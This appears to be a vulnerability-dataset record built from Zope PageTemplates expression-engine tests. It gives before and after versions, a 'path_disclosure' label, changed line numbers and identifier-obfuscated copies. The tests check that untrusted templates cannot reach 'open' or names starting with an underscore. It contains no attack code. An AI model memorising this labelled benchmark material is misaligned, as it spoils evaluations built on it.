self.assertEqual(ec.evaluate('d/one'), 1)
def test_evaluate_simple_path_dict_key_string_value(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('d/b'), 'b')
def test_evaluate_with_render_simple_callable(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('dummy'), 'dummy')
def test_evaluate_with_unimplemented_call(self):
class Dummy:
def __call__(self):
raise NotImplementedError()
dummy = Dummy()
ec = self._makeContext(bindings={'dummy': dummy})
self.assertIs(ec.evaluate('dummy'), dummy)
def test_evaluate_with_render_DTML_template(self):
# http://www.zope.org/Collectors/Zope/2232
# DTML templates could not be called from a Page Template
# due to an ImportError
ec = self._makeContext()
self.assertEqual(ec.evaluate('dummy2'), 'dummy')
def test_evaluate_alternative_first_missing(self):
ec = self._makeContext()
self.assertTrue(ec.evaluate('x | nothing') is None)
def test_evaluate_dict_key_as_underscore(self):
# Traversing to the name `_` will raise a DeprecationWarning
# because it will go away in Zope 6.
ec = self._makeContext()
with warnings.catch_warnings():
warnings.simplefilter('ignore')
self.assertEqual(ec.evaluate('d/_'), 'under')
def test_evaluate_dict_with_key_from_expansion(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('d/?blank'), 'blank')
def test_hybrid_with_python_expression_int_value(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('x | python:1+1'), 2)
def test_hybrid_with_python_expression_type_value_not_called(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('x | python:int'), int)
def test_hybrid_with_string_expression(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('x | string:x'), 'x')
def test_hybrid_with_string_expression_and_expansion(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('x | string:$one'), '1')
def test_hybrid_with_compound_expression_int_value(self):
ec = self._makeContext()
self.assertTrue(ec.evaluate('x | not:exists:x'))
def test_access_iterator_from_python_expression(self):
ec = self._makeContext()
ec.beginScope()
ec.setRepeat('loop', "python:[1,2,3]")
self.assertTrue(ec.evaluate("python:repeat['loop'].odd()"))
ec.endScope()
def test_defer_expression_returns_wrapper(self):
from zope.tales.expressions import DeferWrapper
ec = self._makeContext()
defer = ec.evaluate('defer: b')
self.assertIsInstance(defer, DeferWrapper)
def test_lazy_expression_returns_wrapper(self):
from zope.tales.expressions import LazyWrapper
ec = self._makeContext()
lazy = ec.evaluate('lazy: b')
self.assertIsInstance(lazy, LazyWrapper)
def test_empty_path_expression_explicit(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('path:'), None)
def test_empty_path_expression_explicit_with_trailing_whitespace(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('path: '), None)
def test_empty_path_expression_implicit(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate(''), None)
def test_empty_path_expression_implicit_with_trailing_whitespace(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate(' \n'), None)
def test_unicode(self):
# All our string expressions are unicode now
eng = self._makeEngine()
ec = self._makeContext()
# XXX: can't do ec.evaluate(u'string:x') directly because ZopeContext
# only bothers compiling true strings, not unicode strings
result = ec.evaluate(eng.compile('string:x'))
self.assertEqual(result, 'x')
self.assertIsInstance(result, str)
def test_mixed(self):
# 8-bit strings in unicode string expressions cause UnicodeDecodeErrors
eng = self._makeEngine()
ec = self._makeContext()
expr = eng.compile('string:$eightbit')
self.assertRaises(UnicodeDecodeError,
ec.evaluate, expr)
# But registering an appropriate IUnicodeEncodingConflictResolver
# should fix it
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
StrictUnicodeEncodingConflictResolver
from zope.component import provideUtility
provideUtility(StrictUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
self.assertEqual(ec.evaluate(expr), 'äüö')
def test_builtin_in_path_expr(self):
ec = self._makeContext()
self.assertIs(ec.evaluate('True'), True)
self.assertIs(ec.evaluate('False'), False)
self.assertIs(ec.evaluate('nocall: test'), safe_builtins["test"])
class UntrustedEngineTests(EngineTestsBase, unittest.TestCase):
def _makeEngine(self):
from Products.PageTemplates.Expressions import createZopeEngine
return createZopeEngine()
# XXX: add tests that show security checks being enforced
def test_open_in_path_expr(self):
ec = self._makeContext()
with self.assertRaises(KeyError):
ec.evaluate("nocall:open")
def test_list_in_path_expr(self):
ec = self._makeContext()
self.assertIs(ec.evaluate('nocall: list'), safe_builtins["list"])
def test_underscore_traversal(self):
# Prevent traversal to names starting with an underscore (_)
ec = self._makeContext()
with self.assertRaises(NotFound):
ec.evaluate("context/__class__")
with self.assertRaises(NotFound):
ec.evaluate("nocall: random/_itertools/repeat")
with self.assertRaises(NotFound):
ec.evaluate("random/_itertools/repeat/foobar")
class TrustedEngineTests(EngineTestsBase, unittest.TestCase):
def _makeEngine(self):
from Products.PageTemplates.Expressions import createTrustedZopeEngine
return createTrustedZopeEngine()
# XXX: add tests that show security checks *not* being enforced
def test_open_in_path_expr(self):
ec = self._makeContext()
self.assertIs(ec.evaluate("nocall:open"), open)
def test_list_in_path_expr(self):
ec = self._makeContext()
self.assertIs(ec.evaluate('nocall: list'), list)
class UnicodeEncodingConflictResolverTests(PlacelessSetup, unittest.TestCase):
def testDefaultResolver(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
DefaultUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(DefaultUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
resolver = getUtility(IUnicodeEncodingConflictResolver)
self.assertRaises(UnicodeDecodeError,
resolver.resolve, None, b'\xe4\xfc\xf6', None)
def testStrictResolver(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
StrictUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(StrictUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
resolver = getUtility(IUnicodeEncodingConflictResolver)
text = '\xe4\xfc\xe4'
self.assertEqual(resolver.resolve(None, text, None), text)
def testIgnoringResolver(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
IgnoringUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(IgnoringUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
resolver = getUtility(IUnicodeEncodingConflictResolver)
self.assertEqual(resolver.resolve(None, b'\xe4\xfc\xf6', None), '')
def testReplacingResolver(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
ReplacingUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(ReplacingUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
resolver = getUtility(IUnicodeEncodingConflictResolver)
self.assertEqual(resolver.resolve(None, b'\xe4\xfc\xf6', None),
'\ufffd\ufffd\ufffd')
class ZopeContextTests(unittest.TestCase):
def _getTargetClass(self):
from Products.PageTemplates.Expressions import ZopeContext
return ZopeContext
def _makeOne(self, engine=None, contexts=None):
if engine is None:
engine = self._makeEngine()
if contexts is None:
contexts = {}
return self._getTargetClass()(engine, contexts)
def _makeEngine(self):
class DummyEngine:
pass
return DummyEngine()
def test_class_conforms_to_ITALExpressionEngine(self):
from zope.interface.verify import verifyClass
from zope.tal.interfaces import ITALExpressionEngine
verifyClass(ITALExpressionEngine, self._getTargetClass())
def test_instance_conforms_to_ITALExpressionEngine(self):
from zope.interface.verify import verifyObject
from zope.tal.interfaces import ITALExpressionEngine
verifyObject(ITALExpressionEngine, self._makeOne())
def test_createErrorInfo_returns_unrestricted_object(self):
# See: https://bugs.launchpad.net/zope2/+bug/174705
context = self._makeOne()
info = context.createErrorInfo(AttributeError('nonesuch'), (12, 3))
self.assertTrue(info.type is AttributeError)
self.assertEqual(info.__allow_access_to_unprotected_subobjects__, 1)
| import unittest
import warnings
from AccessControl import safe_builtins
from zExceptions import NotFound
from zope.component.testing import PlacelessSetup
from zope.location.interfaces import LocationError
class EngineTestsBase(PlacelessSetup):
def setUp(self):
from zope.component import provideAdapter
from zope.traversing.adapters import DefaultTraversable
PlacelessSetup.setUp(self)
provideAdapter(DefaultTraversable, (None,))
def tearDown(self):
PlacelessSetup.tearDown(self)
def _makeEngine(self):
# subclasses must override
raise NotImplementedError
def _makeContext(self, bindings=None):
class Dummy:
__allow_access_to_unprotected_subobjects__ = 1
def __call__(self):
return 'dummy'
class DummyDocumentTemplate:
__allow_access_to_unprotected_subobjects__ = 1
isDocTemp = True
def __call__(self, client=None, REQUEST={}, RESPONSE=None, **kw):
return 'dummy'
def absolute_url(self, relative=0):
url = 'dummy'
if not relative:
url = "http://server/" + url
return url
_DEFAULT_BINDINGS = dict(
one=1,
d={'one': 1, 'b': 'b', '': 'blank', '_': 'under'},
blank='',
dummy=Dummy(),
dummy2=DummyDocumentTemplate(),
eightbit=b'\xe4\xfc\xf6',
# ZopeContext needs 'context' and 'template' keys for unicode
# conflict resolution
context=Dummy(),
template=DummyDocumentTemplate(),
)
if bindings is None:
bindings = _DEFAULT_BINDINGS
return self._makeEngine().getContext(bindings)
def test_compile(self):
# Test expression compilation
e = self._makeEngine()
for p in ('x', 'x/y', 'x/y/z'):
e.compile(p)
e.compile('path:a|b|c/d/e')
e.compile('string:Fred')
e.compile('string:A$B')
e.compile('string:a ${x/y} b ${y/z} c')
e.compile('python: 2 + 2')
e.compile('python: 2 \n+\n 2\n')
def test_evaluate_simple_path_binding(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('one'), 1)
def test_evaluate_simple_path_dict_key_int_value(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('d/one'), 1)
def test_evaluate_simple_path_dict_key_string_value(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('d/b'), 'b')
def test_evaluate_with_render_simple_callable(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('dummy'), 'dummy')
def test_evaluate_with_unimplemented_call(self):
class Dummy:
def __call__(self):
raise NotImplementedError()
dummy = Dummy()
ec = self._makeContext(bindings={'dummy': dummy})
self.assertIs(ec.evaluate('dummy'), dummy)
def test_evaluate_with_render_DTML_template(self):
# http://www.zope.org/Collectors/Zope/2232
# DTML templates could not be called from a Page Template
# due to an ImportError
ec = self._makeContext()
self.assertEqual(ec.evaluate('dummy2'), 'dummy')
def test_evaluate_alternative_first_missing(self):
ec = self._makeContext()
self.assertTrue(ec.evaluate('x | nothing') is None)
def test_evaluate_dict_key_as_underscore(self):
# Traversing to the name `_` will raise a DeprecationWarning
# because it will go away in Zope 6.
ec = self._makeContext()
with warnings.catch_warnings():
warnings.simplefilter('ignore')
self.assertEqual(ec.evaluate('d/_'), 'under')
def test_evaluate_dict_with_key_from_expansion(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('d/?blank'), 'blank')
def test_hybrid_with_python_expression_int_value(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('x | python:1+1'), 2)
def test_hybrid_with_python_expression_type_value_not_called(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('x | python:int'), int)
def test_hybrid_with_string_expression(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('x | string:x'), 'x')
def test_hybrid_with_string_expression_and_expansion(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('x | string:$one'), '1')
def test_hybrid_with_compound_expression_int_value(self):
ec = self._makeContext()
self.assertTrue(ec.evaluate('x | not:exists:x'))
def test_access_iterator_from_python_expression(self):
ec = self._makeContext()
ec.beginScope()
ec.setRepeat('loop', "python:[1,2,3]")
self.assertTrue(ec.evaluate("python:repeat['loop'].odd()"))
ec.endScope()
def test_defer_expression_returns_wrapper(self):
from zope.tales.expressions import DeferWrapper
ec = self._makeContext()
defer = ec.evaluate('defer: b')
self.assertIsInstance(defer, DeferWrapper)
def test_lazy_expression_returns_wrapper(self):
from zope.tales.expressions import LazyWrapper
ec = self._makeContext()
lazy = ec.evaluate('lazy: b')
self.assertIsInstance(lazy, LazyWrapper)
def test_empty_path_expression_explicit(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('path:'), None)
def test_empty_path_expression_explicit_with_trailing_whitespace(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate('path: '), None)
def test_empty_path_expression_implicit(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate(''), None)
def test_empty_path_expression_implicit_with_trailing_whitespace(self):
ec = self._makeContext()
self.assertEqual(ec.evaluate(' \n'), None)
def test_unicode(self):
# All our string expressions are unicode now
eng = self._makeEngine()
ec = self._makeContext()
# XXX: can't do ec.evaluate(u'string:x') directly because ZopeContext
# only bothers compiling true strings, not unicode strings
result = ec.evaluate(eng.compile('string:x'))
self.assertEqual(result, 'x')
self.assertIsInstance(result, str)
def test_mixed(self):
# 8-bit strings in unicode string expressions cause UnicodeDecodeErrors
eng = self._makeEngine()
ec = self._makeContext()
expr = eng.compile('string:$eightbit')
self.assertRaises(UnicodeDecodeError,
ec.evaluate, expr)
# But registering an appropriate IUnicodeEncodingConflictResolver
# should fix it
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
StrictUnicodeEncodingConflictResolver
from zope.component import provideUtility
provideUtility(StrictUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
self.assertEqual(ec.evaluate(expr), 'äüö')
def test_builtin_in_path_expr(self):
ec = self._makeContext()
self.assertIs(ec.evaluate('True'), True)
self.assertIs(ec.evaluate('False'), False)
self.assertIs(ec.evaluate('nocall: test'), safe_builtins["test"])
class UntrustedEngineTests(EngineTestsBase, unittest.TestCase):
def _makeEngine(self):
from Products.PageTemplates.Expressions import createZopeEngine
return createZopeEngine()
# XXX: add tests that show security checks being enforced
def test_open_in_path_expr(self):
ec = self._makeContext()
with self.assertRaises(KeyError):
ec.evaluate("nocall:open")
def test_list_in_path_expr(self):
ec = self._makeContext()
self.assertIs(ec.evaluate('nocall: list'), safe_builtins["list"])
def test_underscore_traversal(self):
# Prevent traversal to names starting with an underscore (_)
ec = self._makeContext()
with self.assertRaises(NotFound):
ec.evaluate("context/__class__")
with self.assertRaises((NotFound, LocationError)):
ec.evaluate("nocall: random/_itertools/repeat")
with self.assertRaises((NotFound, LocationError)):
ec.evaluate("random/_itertools/repeat/foobar")
class TrustedEngineTests(EngineTestsBase, unittest.TestCase):
def _makeEngine(self):
from Products.PageTemplates.Expressions import createTrustedZopeEngine
return createTrustedZopeEngine()
# XXX: add tests that show security checks *not* being enforced
def test_open_in_path_expr(self):
ec = self._makeContext()
self.assertIs(ec.evaluate("nocall:open"), open)
def test_list_in_path_expr(self):
ec = self._makeContext()
self.assertIs(ec.evaluate('nocall: list'), list)
class UnicodeEncodingConflictResolverTests(PlacelessSetup, unittest.TestCase):
def testDefaultResolver(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
DefaultUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(DefaultUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
resolver = getUtility(IUnicodeEncodingConflictResolver)
self.assertRaises(UnicodeDecodeError,
resolver.resolve, None, b'\xe4\xfc\xf6', None)
def testStrictResolver(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
StrictUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(StrictUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
resolver = getUtility(IUnicodeEncodingConflictResolver)
text = '\xe4\xfc\xe4'
self.assertEqual(resolver.resolve(None, text, None), text)
def testIgnoringResolver(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
IgnoringUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(IgnoringUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
resolver = getUtility(IUnicodeEncodingConflictResolver)
self.assertEqual(resolver.resolve(None, b'\xe4\xfc\xf6', None), '')
def testReplacingResolver(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
ReplacingUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(ReplacingUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
resolver = getUtility(IUnicodeEncodingConflictResolver)
self.assertEqual(resolver.resolve(None, b'\xe4\xfc\xf6', None),
'\ufffd\ufffd\ufffd')
class ZopeContextTests(unittest.TestCase):
def _getTargetClass(self):
from Products.PageTemplates.Expressions import ZopeContext
return ZopeContext
def _makeOne(self, engine=None, contexts=None):
if engine is None:
engine = self._makeEngine()
if contexts is None:
contexts = {}
return self._getTargetClass()(engine, contexts)
def _makeEngine(self):
class DummyEngine:
pass
return DummyEngine()
def test_class_conforms_to_ITALExpressionEngine(self):
from zope.interface.verify import verifyClass
from zope.tal.interfaces import ITALExpressionEngine
verifyClass(ITALExpressionEngine, self._getTargetClass())
def test_instance_conforms_to_ITALExpressionEngine(self):
from zope.interface.verify import verifyObject
from zope.tal.interfaces import ITALExpressionEngine
verifyObject(ITALExpressionEngine, self._makeOne())
def test_createErrorInfo_returns_unrestricted_object(self):
# See: https://bugs.launchpad.net/zope2/+bug/174705
context = self._makeOne()
info = context.createErrorInfo(AttributeError('nonesuch'), (12, 3))
self.assertTrue(info.type is AttributeError)
self.assertEqual(info.__allow_access_to_unprotected_subobjects__, 1)
| path_disclosure | {
"code": [
" with self.assertRaises(NotFound):",
" with self.assertRaises(NotFound):"
],
"line_no": [
236,
239
]
} | {
"code": [
" with self.assertRaises((NotFound, LocationError)):",
" with self.assertRaises((NotFound, LocationError)):"
],
"line_no": [
237,
240
]
} | import unittest
import warnings
from AccessControl import safe_builtins
from zExceptions import NotFound
from zope.component.testing import PlacelessSetup
class CLASS_0(PlacelessSetup):
def FUNC_0(self):
from zope.component import provideAdapter
from zope.traversing.adapters import DefaultTraversable
PlacelessSetup.setUp(self)
provideAdapter(DefaultTraversable, (None,))
def FUNC_1(self):
PlacelessSetup.tearDown(self)
def FUNC_2(self):
raise NotImplementedError
def FUNC_3(self, VAR_0=None):
class CLASS_5:
__allow_access_to_unprotected_subobjects__ = 1
def __call__(self):
return 'dummy'
class CLASS_6:
__allow_access_to_unprotected_subobjects__ = 1
VAR_16 = True
def __call__(self, VAR_17=None, VAR_18={}, VAR_19=None, **VAR_20):
return 'dummy'
def FUNC_41(self, VAR_21=0):
VAR_22 = 'dummy'
if not VAR_21:
VAR_22 = "http://server/" + VAR_22
return VAR_22
VAR_3 = dict(
one=1,
d={'one': 1, 'b': 'b', '': 'blank', '_': 'under'},
blank='',
VAR_6=CLASS_5(),
dummy2=CLASS_6(),
eightbit=b'\xe4\xfc\xf6',
VAR_14=CLASS_5(),
template=CLASS_6(),
)
if VAR_0 is None:
VAR_0 = VAR_3
return self._makeEngine().getContext(VAR_0)
def FUNC_4(self):
VAR_4 = self._makeEngine()
for p in ('x', 'x/y', 'x/y/z'):
VAR_4.compile(p)
VAR_4.compile('path:a|b|c/d/e')
VAR_4.compile('string:Fred')
VAR_4.compile('string:A$B')
VAR_4.compile('string:a ${x/y} b ${y/z} c')
VAR_4.compile('python: 2 + 2')
VAR_4.compile('python: 2 \n+\n 2\n')
def FUNC_5(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('one'), 1)
def FUNC_6(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('d/one'), 1)
def FUNC_7(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('d/b'), 'b')
def FUNC_8(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('dummy'), 'dummy')
def FUNC_9(self):
class CLASS_5:
def __call__(self):
raise NotImplementedError()
VAR_6 = CLASS_5()
VAR_5 = self._makeContext(VAR_0={'dummy': VAR_6})
self.assertIs(VAR_5.evaluate('dummy'), VAR_6)
def FUNC_10(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('dummy2'), 'dummy')
def FUNC_11(self):
VAR_5 = self._makeContext()
self.assertTrue(VAR_5.evaluate('x | nothing') is None)
def FUNC_12(self):
VAR_5 = self._makeContext()
with warnings.catch_warnings():
warnings.simplefilter('ignore')
self.assertEqual(VAR_5.evaluate('d/_'), 'under')
def FUNC_13(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('d/?blank'), 'blank')
def FUNC_14(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('x | python:1+1'), 2)
def FUNC_15(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('x | python:int'), int)
def FUNC_16(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('x | string:x'), 'x')
def FUNC_17(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('x | string:$one'), '1')
def FUNC_18(self):
VAR_5 = self._makeContext()
self.assertTrue(VAR_5.evaluate('x | not:exists:x'))
def FUNC_19(self):
VAR_5 = self._makeContext()
VAR_5.beginScope()
VAR_5.setRepeat('loop', "python:[1,2,3]")
self.assertTrue(VAR_5.evaluate("python:repeat['loop'].odd()"))
VAR_5.endScope()
def FUNC_20(self):
from zope.tales.expressions import DeferWrapper
VAR_5 = self._makeContext()
VAR_7 = VAR_5.evaluate('defer: b')
self.assertIsInstance(VAR_7, DeferWrapper)
def FUNC_21(self):
from zope.tales.expressions import LazyWrapper
VAR_5 = self._makeContext()
VAR_8 = VAR_5.evaluate('lazy: b')
self.assertIsInstance(VAR_8, LazyWrapper)
def FUNC_22(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('path:'), None)
def FUNC_23(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('path: '), None)
def FUNC_24(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate(''), None)
def FUNC_25(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate(' \n'), None)
def FUNC_26(self):
VAR_9 = self._makeEngine()
VAR_5 = self._makeContext()
VAR_10 = VAR_5.evaluate(VAR_9.compile('string:x'))
self.assertEqual(VAR_10, 'x')
self.assertIsInstance(VAR_10, str)
def FUNC_27(self):
VAR_9 = self._makeEngine()
VAR_5 = self._makeContext()
VAR_11 = VAR_9.compile('string:$eightbit')
self.assertRaises(UnicodeDecodeError,
VAR_5.evaluate, VAR_11)
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
StrictUnicodeEncodingConflictResolver
from zope.component import provideUtility
provideUtility(StrictUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
self.assertEqual(VAR_5.evaluate(VAR_11), 'äüö')
def FUNC_28(self):
VAR_5 = self._makeContext()
self.assertIs(VAR_5.evaluate('True'), True)
self.assertIs(VAR_5.evaluate('False'), False)
self.assertIs(VAR_5.evaluate('nocall: test'), safe_builtins["test"])
class CLASS_1(CLASS_0, unittest.TestCase):
def FUNC_2(self):
from Products.PageTemplates.Expressions import createZopeEngine
return createZopeEngine()
def FUNC_29(self):
VAR_5 = self._makeContext()
with self.assertRaises(KeyError):
VAR_5.evaluate("nocall:open")
def FUNC_30(self):
VAR_5 = self._makeContext()
self.assertIs(VAR_5.evaluate('nocall: list'), safe_builtins["list"])
def FUNC_31(self):
VAR_5 = self._makeContext()
with self.assertRaises(NotFound):
VAR_5.evaluate("context/__class__")
with self.assertRaises(NotFound):
VAR_5.evaluate("nocall: random/_itertools/repeat")
with self.assertRaises(NotFound):
VAR_5.evaluate("random/_itertools/repeat/foobar")
class CLASS_2(CLASS_0, unittest.TestCase):
def FUNC_2(self):
from Products.PageTemplates.Expressions import createTrustedZopeEngine
return createTrustedZopeEngine()
def FUNC_29(self):
VAR_5 = self._makeContext()
self.assertIs(VAR_5.evaluate("nocall:open"), open)
def FUNC_30(self):
VAR_5 = self._makeContext()
self.assertIs(VAR_5.evaluate('nocall: list'), list)
class CLASS_3(PlacelessSetup, unittest.TestCase):
def FUNC_32(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
DefaultUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(DefaultUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
VAR_12 = getUtility(IUnicodeEncodingConflictResolver)
self.assertRaises(UnicodeDecodeError,
VAR_12.resolve, None, b'\xe4\xfc\xf6', None)
def FUNC_33(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
StrictUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(StrictUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
VAR_12 = getUtility(IUnicodeEncodingConflictResolver)
VAR_13 = '\xe4\xfc\xe4'
self.assertEqual(VAR_12.resolve(None, VAR_13, None), VAR_13)
def FUNC_34(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
IgnoringUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(IgnoringUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
VAR_12 = getUtility(IUnicodeEncodingConflictResolver)
self.assertEqual(VAR_12.resolve(None, b'\xe4\xfc\xf6', None), '')
def FUNC_35(self):
from Products.PageTemplates.interfaces import \
IUnicodeEncodingConflictResolver
from Products.PageTemplates.unicodeconflictresolver import \
ReplacingUnicodeEncodingConflictResolver
from zope.component import getUtility
from zope.component import provideUtility
provideUtility(ReplacingUnicodeEncodingConflictResolver,
IUnicodeEncodingConflictResolver)
VAR_12 = getUtility(IUnicodeEncodingConflictResolver)
self.assertEqual(VAR_12.resolve(None, b'\xe4\xfc\xf6', None),
'\ufffd\ufffd\ufffd')
class CLASS_4(unittest.TestCase):
def FUNC_36(self):
from Products.PageTemplates.Expressions import ZopeContext
return ZopeContext
def FUNC_37(self, VAR_1=None, VAR_2=None):
if VAR_1 is None:
VAR_1 = self._makeEngine()
if VAR_2 is None:
VAR_2 = {}
return self._getTargetClass()(VAR_1, VAR_2)
def FUNC_2(self):
class CLASS_7:
pass
return CLASS_7()
def FUNC_38(self):
from zope.interface.verify import verifyClass
from zope.tal.interfaces import ITALExpressionEngine
verifyClass(ITALExpressionEngine, self._getTargetClass())
def FUNC_39(self):
from zope.interface.verify import verifyObject
from zope.tal.interfaces import ITALExpressionEngine
verifyObject(ITALExpressionEngine, self._makeOne())
def FUNC_40(self):
VAR_14 = self._makeOne()
VAR_15 = VAR_14.createErrorInfo(AttributeError('nonesuch'), (12, 3))
self.assertTrue(VAR_15.type is AttributeError)
self.assertEqual(VAR_15.__allow_access_to_unprotected_subobjects__, 1)
| import unittest
import warnings
from AccessControl import safe_builtins
from zExceptions import NotFound
from zope.component.testing import PlacelessSetup
from zope.location.interfaces import LocationError
class CLASS_0(PlacelessSetup):
def FUNC_0(self):
from zope.component import provideAdapter
from zope.traversing.adapters import DefaultTraversable
PlacelessSetup.setUp(self)
provideAdapter(DefaultTraversable, (None,))
def FUNC_1(self):
PlacelessSetup.tearDown(self)
def FUNC_2(self):
raise NotImplementedError
def FUNC_3(self, VAR_0=None):
class CLASS_5:
__allow_access_to_unprotected_subobjects__ = 1
def __call__(self):
return 'dummy'
class CLASS_6:
__allow_access_to_unprotected_subobjects__ = 1
VAR_16 = True
def __call__(self, VAR_17=None, VAR_18={}, VAR_19=None, **VAR_20):
return 'dummy'
def FUNC_41(self, VAR_21=0):
VAR_22 = 'dummy'
if not VAR_21:
VAR_22 = "http://server/" + VAR_22
return VAR_22
VAR_3 = dict(
one=1,
d={'one': 1, 'b': 'b', '': 'blank', '_': 'under'},
blank='',
VAR_6=CLASS_5(),
dummy2=CLASS_6(),
eightbit=b'\xe4\xfc\xf6',
VAR_14=CLASS_5(),
template=CLASS_6(),
)
if VAR_0 is None:
VAR_0 = VAR_3
return self._makeEngine().getContext(VAR_0)
def FUNC_4(self):
VAR_4 = self._makeEngine()
for p in ('x', 'x/y', 'x/y/z'):
VAR_4.compile(p)
VAR_4.compile('path:a|b|c/d/e')
VAR_4.compile('string:Fred')
VAR_4.compile('string:A$B')
VAR_4.compile('string:a ${x/y} b ${y/z} c')
VAR_4.compile('python: 2 + 2')
VAR_4.compile('python: 2 \n+\n 2\n')
def FUNC_5(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('one'), 1)
def FUNC_6(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('d/one'), 1)
def FUNC_7(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('d/b'), 'b')
def FUNC_8(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('dummy'), 'dummy')
def FUNC_9(self):
class CLASS_5:
def __call__(self):
raise NotImplementedError()
VAR_6 = CLASS_5()
VAR_5 = self._makeContext(VAR_0={'dummy': VAR_6})
self.assertIs(VAR_5.evaluate('dummy'), VAR_6)
def FUNC_10(self):
VAR_5 = self._makeContext()
self.assertEqual(VAR_5.evaluate('dummy2'), 'dummy')
def FUNC_11(self):
VAR_5 = self._makeContext()
self.assertTrue(VAR_5.evaluate('x | nothing') is None)
def FUNC_12(self):
VAR_5 = self._makeContext()
